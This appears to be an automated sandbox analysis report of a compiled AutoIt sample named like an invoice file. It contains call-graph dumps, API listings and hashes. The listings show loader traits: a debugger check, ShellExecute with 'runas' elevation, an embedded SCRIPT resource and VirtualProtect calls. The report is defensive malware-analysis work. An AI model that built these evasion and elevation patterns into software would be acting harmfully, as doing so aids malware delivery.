109535 42e064 WideCharToMultiByte 109518->109535 109519 42da8b GetConsoleMode 109519->109508 109520 42daca 109519->109520 109520->109508 109524 42dada GetConsoleCP 109520->109524 109586 42c5f6 109521->109586 109523->109521 109523->109528 109529 42ded8 109523->109529 109524->109528 109550 42db09 109524->109550 109525->109516 109526 42de98 109525->109526 109526->109515 109531 42debc 109526->109531 109527 42e1b2 109585 428af4 58 API calls __getptd_noexit 109527->109585 109528->109521 109584 428b28 58 API calls __getptd_noexit 109528->109584 109533 42dee3 109529->109533 109534 42e17b 109529->109534 109530->109516 109536 42dfb9 109530->109536 109531->109523 109581 428b28 58 API calls __getptd_noexit 109533->109581 109583 428b07 58 API calls 3 library calls 109534->109583 109535->109516 109544 42e0ab 109535->109544 109536->109517 109536->109523 109536->109531 109539 42e0b3 WriteFile 109542 42e106 GetLastError 109539->109542 109539->109544 109540 42dee8 109582 428af4 58 API calls __getptd_noexit 109540->109582 109542->109544 109544->109518 109544->109523 109544->109531 109544->109539 109545 4362ba 60 API calls __write_nolock 109545->109550 109546 437a5e WriteConsoleW CreateFileW __putwch_nolock 109549 42dc5f 109546->109549 109547 42dbf2 WideCharToMultiByte 109547->109523 109548 42dc2d WriteFile 109547->109548 109548->109516 109548->109549 109549->109516 109549->109523 109549->109546 109549->109550 109551 42dc87 WriteFile 109549->109551 109550->109523 109550->109545 109550->109547 109550->109549 109580 4235f5 58 API calls __isleadbyte_l 109550->109580 109551->109516 109551->109549 109552->109459 109553->109471 109554->109462 109555->109476 109556->109475 109557->109471 109558->109462 109559->109470 109560->109471 109561->109485 109562->109481 109564 435c76 109563->109564 109566 435c83 109563->109566 109565 428b28 _memcpy_s 58 API calls 109564->109565 109569 435c7b 109565->109569 109567 435c8f 109566->109567 109568 428b28 _memcpy_s 58 API calls 109566->109568 109567->109506 
109570 435cb0 109568->109570 109569->109506 109571 428db6 _memcpy_s 9 API calls 109570->109571 109571->109569 109572->109494 109573->109501 109574->109521 109575->109504 109576->109509 109577->109521 109578->109499 109579->109519 109580->109550 109581->109540 109582->109521 109583->109521 109584->109527 109585->109521 109587 42c600 IsProcessorFeaturePresent 109586->109587 109588 42c5fe 109586->109588 109590 43590a 109587->109590 109588->109497 109591 4358b9 ___raise_securityfailure 5 API calls 109590->109591 109592 4359ed 109591->109592 109592->109497 109593->109420 109594->109422 109618 42d4c3 109595->109618 109597 430b41 109631 42d43d 59 API calls 2 library calls 109597->109631 109599 430aeb 109599->109597 109600 42d4c3 __close_nolock 58 API calls 109599->109600 109609 430b1f 109599->109609 109605 430b16 109600->109605 109601 42d4c3 __close_nolock 58 API calls 109602 430b2b CloseHandle 109601->109602 109602->109597 109606 430b37 GetLastError 109602->109606 109603 430b6b 109603->109447 109604 430b49 109604->109603 109632 428b07 58 API calls 3 library calls 109604->109632 109608 42d4c3 __close_nolock 58 API calls 109605->109608 109606->109597 109608->109609 109609->109597 109609->109601 109610->109429 109611->109446 109612->109435 109613->109447 109614->109446 109615->109435 109616->109440 109617->109446 109619 42d4e3 109618->109619 109620 42d4ce 109618->109620 109626 42d508 109619->109626 109635 428af4 58 API calls __getptd_noexit 109619->109635 109633 428af4 58 API calls __getptd_noexit 109620->109633 109622 42d4d3 109634 428b28 58 API calls __getptd_noexit 109622->109634 109624 42d512 109636 428b28 58 API calls __getptd_noexit 109624->109636 109626->109599 109628 42d4db 109628->109599 109629 42d51a 109637 428db6 9 API calls _memcpy_s 109629->109637 109631->109604 109632->109603 109633->109622 109634->109628 109635->109624 109636->109629 109637->109628 109639 409837 84 API calls 109638->109639 109640 47cb1a 109639->109640 109663 47cb61 Mailbox 109640->109663 
109676 47d7a5 109640->109676 109642 47cdb9 109643 47cf2e 109642->109643 109647 47cdc7 109642->109647 109725 47d8c8 92 API calls Mailbox 109643->109725 109646 47cf3d 109646->109647 109648 47cf49 109646->109648 109689 47c96e 109647->109689 109648->109663 109649 409837 84 API calls 109664 47cbb2 Mailbox 109649->109664 109654 47ce00 109704 420c08 109654->109704 109657 47ce33 109711 4092ce 109657->109711 109658 47ce1a 109710 469e4a 89 API calls 4 library calls 109658->109710 109661 47ce25 GetCurrentProcess TerminateProcess 109661->109657 109663->109272 109664->109642 109664->109649 109664->109663 109708 47fbce 59 API calls 2 library calls 109664->109708 109709 47cfdf 61 API calls 2 library calls 109664->109709 109668 47cfa4 109668->109663 109671 47cfb8 FreeLibrary 109668->109671 109669 47ce6b 109723 47d649 107 API calls _free 109669->109723 109671->109663 109674 409d3c 60 API calls 109675 47ce7c 109674->109675 109675->109668 109675->109674 109724 408d40 59 API calls Mailbox 109675->109724 109726 47d649 107 API calls _free 109675->109726 109677 407e4f 59 API calls 109676->109677 109678 47d7c0 CharLowerBuffW 109677->109678 109727 45f167 109678->109727 109682 407667 59 API calls 109683 47d7f9 109682->109683 109734 40784b 109683->109734 109685 47d858 Mailbox 109685->109664 109686 47d810 109747 407d2c 109686->109747 109688 47d81c Mailbox 109688->109685 109751 47cfdf 61 API calls 2 library calls 109688->109751 109690 47c989 109689->109690 109694 47c9de 109689->109694 109691 420db6 Mailbox 59 API calls 109690->109691 109692 47c9ab 109691->109692 109693 420db6 Mailbox 59 API calls 109692->109693 109692->109694 109693->109692 109695 47da50 109694->109695 109696 47dc79 Mailbox 109695->109696 109703 47da73 _strcat _wcscpy __wsetenvp 109695->109703 109696->109654 109697 409b98 59 API calls 109697->109703 109698 409be6 59 API calls 109698->109703 109699 409b3c 59 API calls 109699->109703 109700 409837 84 API calls 109700->109703 109701 42571c 58 API calls __malloc_crt 109701->109703 
109703->109696 109703->109697 109703->109698 109703->109699 109703->109700 109703->109701 109761 465887 61 API calls 2 library calls 109703->109761 109706 420c1d 109704->109706 109705 420cb5 VirtualProtect 109707 420c83 109705->109707 109706->109705 109706->109707 109707->109657 109707->109658 109708->109664 109709->109664 109710->109661 109712 4092d6 109711->109712 109713 420db6 Mailbox 59 API calls 109712->109713 109714 4092e4 109713->109714 109715 4092f0 109714->109715 109762 4091fc 59 API calls Mailbox 109714->109762 109717 409050 109715->109717 109763 409160 109717->109763 109719 40905f 109720 420db6 Mailbox 59 API calls 109719->109720 109721 4090fb 109719->109721 109720->109721 109721->109675 109722 408d40 59 API calls Mailbox 109721->109722 109722->109669 109723->109675 109724->109675 109725->109646 109726->109675 109729 45f192 __wsetenvp 109727->109729 109728 45f1d1 109728->109682 109728->109688 109729->109728 109730 45f278 109729->109730 109733 45f1c7 109729->109733 109730->109728 109753 4078c4 61 API calls 109730->109753 109733->109728 109752 4078c4 61 API calls 109733->109752 109735 4078b7 109734->109735 109736 40785a 109734->109736 109737 407d2c 59 API calls 109735->109737 109736->109735 109738 407865 109736->109738 109744 407888 _memmove 109737->109744 109739 407880 109738->109739 109740 43eb09 109738->109740 109754 407f27 109739->109754 109758 408029 109740->109758 109743 43eb13 109745 420db6 Mailbox 59 API calls 109743->109745 109744->109686 109746 43eb33 109745->109746 109748 407d3a 109747->109748 109750 407d43 _memmove 109747->109750 109749 407e4f 59 API calls 109748->109749 109748->109750 109749->109750 109750->109688 109751->109685 109752->109733 109753->109730 109756 407f3f 109754->109756 109757 407f39 109754->109757 109755 420db6 Mailbox 59 API calls 109755->109757 109756->109755 109757->109744 109759 420db6 Mailbox 59 API calls 109758->109759 109760 408033 109759->109760 109760->109743 109761->109703 109762->109715 109764 409169 Mailbox 
109763->109764 109765 43f19f 109764->109765 109770 409173 109764->109770 109766 420db6 Mailbox 59 API calls 109765->109766 109768 43f1ab 109766->109768 109767 40917a 109767->109719 109769 409c90 Mailbox 59 API calls 109769->109770 109770->109767 109770->109769 109772 463c3e 109771->109772 109773 464475 FindFirstFileW 109771->109773 109772->109118 109773->109772 109774 46448a FindClose 109773->109774 109774->109772 109993 404bb5 109775->109993 109780 43d8e6 109783 404e4a 84 API calls 109780->109783 109781 404e08 LoadLibraryExW 110003 404b6a 109781->110003 109785 43d8ed 109783->109785 109787 404b6a 3 API calls 109785->109787 109788 43d8f5 109787->109788 110029 404f0b 109788->110029 109789 404e2f 109789->109788 109790 404e3b 109789->109790 109792 404e4a 84 API calls 109790->109792 109794 404e40 109792->109794 109794->109293 109794->109296 109796 43d91c 110037 404ec7 109796->110037 109800 407667 59 API calls 109799->109800 109801 4045b1 109800->109801 109802 407667 59 API calls 109801->109802 109803 4045b9 109802->109803 109804 407667 59 API calls 109803->109804 109805 4045c1 109804->109805 109806 407667 59 API calls 109805->109806 109807 4045c9 109806->109807 109808 43d4d2 109807->109808 109809 4045fd 109807->109809 109810 408047 59 API calls 109808->109810 109811 40784b 59 API calls 109809->109811 109812 43d4db 109810->109812 109813 40460b 109811->109813 110206 407d8c 109812->110206 109815 407d2c 59 API calls 109813->109815 109817 404615 109815->109817 109816 404640 109819 404680 109816->109819 109821 40465f 109816->109821 109832 43d4fb 109816->109832 109817->109816 109818 40784b 59 API calls 109817->109818 109822 404636 109818->109822 109820 40784b 59 API calls 109819->109820 109823 404691 109820->109823 109826 4079f2 59 API calls 109821->109826 109825 407d2c 59 API calls 109822->109825 109827 4046a3 109823->109827 109830 408047 59 API calls 109823->109830 109824 43d5cb 109828 407bcc 59 API calls 109824->109828 109825->109816 109829 404669 109826->109829 109831 
4046b3 109827->109831 109834 408047 59 API calls 109827->109834 109845 43d588 109828->109845 109829->109819 109833 40784b 59 API calls 109829->109833 109830->109827 109836 4046ba 109831->109836 109837 408047 59 API calls 109831->109837 109832->109824 109835 43d5b4 109832->109835 109844 43d532 109832->109844 109833->109819 109834->109831 109835->109824 109840 43d59f 109835->109840 109838 408047 59 API calls 109836->109838 109847 4046c1 Mailbox 109836->109847 109837->109836 109838->109847 109839 4079f2 59 API calls 109839->109845 109842 407bcc 59 API calls 109840->109842 109841 43d590 109843 407bcc 59 API calls 109841->109843 109842->109845 109843->109845 109844->109841 109848 43d57b 109844->109848 109845->109819 109845->109839 110210 407924 59 API calls 2 library calls 109845->110210 109847->109324 109849 407bcc 59 API calls 109848->109849 109849->109845 109851 407e4f 59 API calls 109850->109851 109852 4079fd 109851->109852 109852->109330 109852->109332 109854 407b40 109853->109854 109855 43ec6b 109853->109855 110211 407a51 109854->110211 110217 457bdb 59 API calls _memmove 109855->110217 109858 407b4c 109858->109339 109859 43ec75 109860 408047 59 API calls 109859->109860 109861 43ec7d Mailbox 109860->109861 109863 46408d 109862->109863 109864 464092 109863->109864 109865 4640a0 109863->109865 109866 408047 59 API calls 109864->109866 109867 407667 59 API calls 109865->109867 109868 46409b Mailbox 109866->109868 109869 4640a8 109867->109869 109868->109348 109870 407667 59 API calls 109869->109870 109871 4640b0 109870->109871 109872 407667 59 API calls 109871->109872 109873 4640bb 109872->109873 109874 407667 59 API calls 109873->109874 109875 4640c3 109874->109875 109876 407667 59 API calls 109875->109876 109877 4640cb 109876->109877 109878 407667 59 API calls 109877->109878 109879 4640d3 109878->109879 109880 407667 59 API calls 109879->109880 109881 4640db 109880->109881 109882 407667 59 API calls 109881->109882 109883 4640e3 109882->109883 109884 40459b 59 API 
calls 109883->109884 109885 4640fa 109884->109885 109886 40459b 59 API calls 109885->109886 109887 464113 109886->109887 109888 4079f2 59 API calls 109887->109888 109889 46411f 109888->109889 109890 464132 109889->109890 109891 407d2c 59 API calls 109889->109891 109892 4079f2 59 API calls 109890->109892 109891->109890 109893 46413b 109892->109893 109894 46414b 109893->109894 109895 407d2c 59 API calls 109893->109895 109895->109894 109917 469162 __write_nolock 109916->109917 109918 420db6 Mailbox 59 API calls 109917->109918 109919 4691bf 109918->109919 109920 40522e 59 API calls 109919->109920 109921 4691c9 109920->109921 109922 468f5f GetSystemTimeAsFileTime 109921->109922 109923 4691d4 109922->109923 109924 404ee5 85 API calls 109923->109924 109925 4691e7 _wcscmp 109924->109925 109926 46920b 109925->109926 109927 4692b8 109925->109927 110237 469734 109926->110237 109929 469734 96 API calls 109927->109929 109944 469284 _wcscat 109929->109944 109932 404f0b 74 API calls 109934 4692dd 109932->109934 109933 4692c1 109933->109354 109935 404f0b 74 API calls 109934->109935 109936 4692ed 109935->109936 109938 404f0b 74 API calls 109936->109938 109937 469239 _wcscat _wcscpy 110244 4240fb 58 API calls __wsplitpath_helper 109937->110244 109940 469308 109938->109940 109941 404f0b 74 API calls 109940->109941 109944->109932 109944->109933 109972 409b4d 109971->109972 109973 409b52 109971->109973 109972->109973 110305 42358a 59 API calls 109972->110305 109973->109281 109976 43ed4a 109975->109976 109977 407cbf 109975->109977 109978 408029 59 API calls 109976->109978 110306 407c50 109977->110306 109981 43ed55 __wsetenvp _memmove 109978->109981 109980 407cca 109980->109315 109982->109317 109983->109331 109985 407c45 109984->109985 109986 407bd8 __wsetenvp 109984->109986 109987 407d2c 59 API calls 109985->109987 109988 407c13 109986->109988 109989 407bee 109986->109989 109992 407bf6 _memmove 109987->109992 109991 408029 59 API calls 109988->109991 109990 407f27 59 API calls 
109989->109990 109990->109992 109991->109992 109992->109340 110042 404c03 109993->110042 109996 404bdc 109997 404bf5 109996->109997 109998 404bec FreeLibrary 109996->109998 110000 42525b 109997->110000 109998->109997 109999 404c03 2 API calls 109999->109996 110046 425270 110000->110046 110002 404dfc 110002->109780 110002->109781 110127 404c36 110003->110127 110006 404b8f 110008 404ba1 FreeLibrary 110006->110008 110009 404baa 110006->110009 110007 404c36 2 API calls 110007->110006 110008->110009 110010 404c70 110009->110010 110011 420db6 Mailbox 59 API calls 110010->110011 110012 404c85 110011->110012 110131 40522e 110012->110131 110014 404c91 _memmove 110015 404ccc 110014->110015 110016 404dc1 110014->110016 110017 404d89 110014->110017 110018 404ec7 69 API calls 110015->110018 110145 46991b 95 API calls 110016->110145 110134 404e89 CreateStreamOnHGlobal 110017->110134 110022 404cd5 110018->110022 110021 404f0b 74 API calls 110021->110022 110022->110021 110023 404d69 110022->110023 110025 43d8a7 110022->110025 110140 404ee5 110022->110140 110023->109789 110026 404ee5 85 API calls 110025->110026 110027 43d8bb 110026->110027 110028 404f0b 74 API calls 110027->110028 110028->110023 110030 404f1d 110029->110030 110031 43d9cd 110029->110031 110163 4255e2 110030->110163 110034 469109 110183 468f5f 110034->110183 110036 46911f 110036->109796 110038 43d990 110037->110038 110039 404ed6 110037->110039 110188 425c60 110039->110188 110041 404ede 110043 404bd0 110042->110043 110044 404c0c LoadLibraryA 110042->110044 110043->109996 110043->109999 110044->110043 110045 404c1d GetProcAddress 110044->110045 110045->110043 110049 42527c __write 110046->110049 110047 42528f 110095 428b28 58 API calls __getptd_noexit 110047->110095 110049->110047 110051 4252c0 110049->110051 110050 425294 110096 428db6 9 API calls _memcpy_s 110050->110096 110065 4304e8 110051->110065 110054 4252c5 110055 4252db 110054->110055 110056 4252ce 110054->110056 110058 425305 110055->110058 110059 4252e5 
111560->111547 111560->111551 111560->111553 111560->111554 111560->111555 111560->111556 111560->111558 111560->111559 111563 40a55a 111560->111563 111600 40c8c0 341 API calls 2 library calls 111560->111600 111601 40b900 60 API calls Mailbox 111560->111601 111614 469e4a 89 API calls 4 library calls 111562->111614 111612 469e4a 89 API calls 4 library calls 111563->111612 111602 40f6a3 341 API calls 111566->111602 111567->111535 111570 409c90 Mailbox 59 API calls 111569->111570 111570->111573 111611 469e4a 89 API calls 4 library calls 111571->111611 111573->111555 111610 45617e 59 API calls Mailbox 111573->111610 111575 409d3c 60 API calls 111574->111575 111577 40b22d 111575->111577 111576->111535 111578 409d3c 60 API calls 111577->111578 111578->111566 111609 469e4a 89 API calls 4 library calls 111579->111609 111580->111535 111583->111535 111585 47cadd 130 API calls 111584->111585 111586 47df33 111585->111586 111586->111535 111588 409837 84 API calls 111587->111588 111589 482436 111588->111589 111590 407667 59 API calls 111589->111590 111591 482444 111590->111591 111592 409b3c 59 API calls 111591->111592 111593 48244f 111592->111593 111594 482479 111593->111594 111596 409837 84 API calls 111593->111596 111615 409a3c 59 API calls Mailbox 111594->111615 111597 48246a 111596->111597 111598 40784b 59 API calls 111597->111598 111598->111594 111599 482485 Mailbox 111599->111535 111600->111560 111601->111560 111602->111579 111603->111535 111604->111535 111605->111535 111606->111535 111607->111535 111608->111546 111609->111573 111610->111555 111611->111573 111612->111555 111613->111562 111614->111555 111615->111599
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d$w
                                          • API String ID: 0-2400632791
                                          • Opcode ID: 777f83ce0f2c4ab612ac65b60f240bacee60c4e15b1d48478835d76c075a3a73
                                          • Instruction ID: 81818918c468b9a559e766c234d2d9acba745378a328a79153ba5c2cde3e5a5e
                                          • Opcode Fuzzy Hash: 777f83ce0f2c4ab612ac65b60f240bacee60c4e15b1d48478835d76c075a3a73
                                          • Instruction Fuzzy Hash: 77C11525A0C384AEDE365B288C5AF793EE0DB63720F4C05D6F566AA0F3D7259C04D662

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                          • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                            • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                          • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                            • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                            • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                            • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                            • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                            • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                            • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                            • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                            • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                            • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                            • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                            • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                            • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                            • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                          • API String ID: 529118366-2806069697
                                          • Opcode ID: 255f10e69cc8df1980d2df773c135a78c85689e8f31627855df614f078967646
                                          • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                          • Opcode Fuzzy Hash: 255f10e69cc8df1980d2df773c135a78c85689e8f31627855df614f078967646
                                          • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 004049CD
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                          • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                          • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                          • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                          • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                          • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                          • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                          • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                          • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                          • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: pbL$%I
                                          • API String ID: 3964851224-1578263234
                                          • Opcode ID: e75918543d8f8fb4d66ffa4b32f5ee6d54476b5022be24708f0abced30fc0e75
                                          • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                          • Opcode Fuzzy Hash: e75918543d8f8fb4d66ffa4b32f5ee6d54476b5022be24708f0abced30fc0e75
                                          • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                          • API String ID: 0-2838938394
                                          • Opcode ID: 5bf42d26b714625c435ed75d2a851a6bbf587f56385a40fea6e1fd74eaad2a3b
                                          • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                          • Opcode Fuzzy Hash: 5bf42d26b714625c435ed75d2a851a6bbf587f56385a40fea6e1fd74eaad2a3b
                                          • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                          • FindClose.KERNEL32(00000000), ref: 0046448B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
